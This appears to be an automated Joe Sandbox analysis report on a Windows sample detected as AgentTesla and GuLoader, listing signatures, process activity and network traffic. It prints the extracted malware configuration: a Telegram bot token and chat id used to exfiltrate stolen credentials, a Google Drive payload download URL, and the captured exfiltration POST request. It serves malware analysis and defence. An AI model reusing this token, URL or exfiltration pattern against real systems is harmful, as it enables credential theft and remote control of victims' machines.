Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AIDetect.malware2.8516.exe

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
Analysis ID:625379
MD5:90e91d605fb261fa827093074c0d7178
SHA1:1737b52ca846659954692ac55235addf749e405b
SHA256:4700f996868b461bae3a5b57efcd8719169d0c9acb400fa77d6a36787b37b0e1
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.W32.AIDetect.malware2.8516.exe (PID: 384 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe" MD5: 90E91D605FB261FA827093074C0D7178)
    • CasPol.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1668 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "5340613581", "Chat URL": "https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB"}
{"C2 url": "https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000004.00000000.34495451157.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.34639544413.0000000002A00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000000.34495451157.0000000001100000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB"}
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exe.384.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5340613581", "Chat URL": "https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument"}
            Source: CasPol.exe.1668.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendMessage"}
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeVirustotal: Detection: 13%Perma Link
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2098A120 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2098A118 CryptUnprotectData,
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040290B FindFirstFileW,

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da343ddb463be8Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jc95onm7rbud0rh2kvsckdceb/1652368050000/02385140022842422686/*/1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-bk-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000004.00000002.39283527029.000000001DB4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34611069380.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34610499874.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34611069380.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34610499874.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000004.00000002.39283433304.000000001DB37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yCCtaB.com
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39283362097.000000001DB2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://Yp7sE2ZThKzSHqA.com
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%t-
            Source: CasPol.exe, 00000004.00000002.39283433304.000000001DB37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
            Source: CasPol.exe, 00000004.00000002.39283433304.000000001DB37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocumentdocument-----
            Source: CasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-bk-docs.googleusercontent.com/
            Source: CasPol.exe, 00000004.00000002.39258953296.00000000014E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-bk-docs.googleusercontent.com/R
            Source: CasPol.exe, 00000004.00000002.39258953296.00000000014E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-bk-docs.googleusercontent.com/_
            Source: CasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34611069380.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34610499874.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3j
            Source: CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/5s(
            Source: CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB
            Source: CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownHTTP traffic detected: POST /bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da343ddb463be8Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jc95onm7rbud0rh2kvsckdceb/1652368050000/02385140022842422686/*/1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-bk-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040755C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_00406D85
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_71751BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A164A5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A15C99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A2366D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A173FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A155C1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A24F24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A254A6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A186A5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A19A80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18C91
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18C97
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A0ED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A20EF4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A2C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A19AD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A174DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1D4DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A2483A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18238
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A03D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A207
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1480F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A21010
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A41D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A17C64
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1946F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A473
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A07C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A19A49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1885D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A25BA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A25FB7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A193B9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1CD83
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1DB87
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A38F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18B93
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A19B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A147E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A189E5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18BF7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A199C9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A187DD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A528
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18B2D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A24301
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A25904
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1A50E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A18715
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A1896D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A28153
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A17756
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D826B62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D82A160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D829890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D829548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20980040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20986078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2098DA18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20985E58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20987250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_209ECD08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_209E1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_209EDFF4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1D82D140 appears 53 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A274BD NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A26F81 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_02A24F24 LoadLibraryA,NtAllocateVirtualMemory,
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: invalid certificate
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeVirustotal: Detection: 13%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeJump to behavior
            Source: SecuriteInfo.com.W32.AIDetect.malware2.8516.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
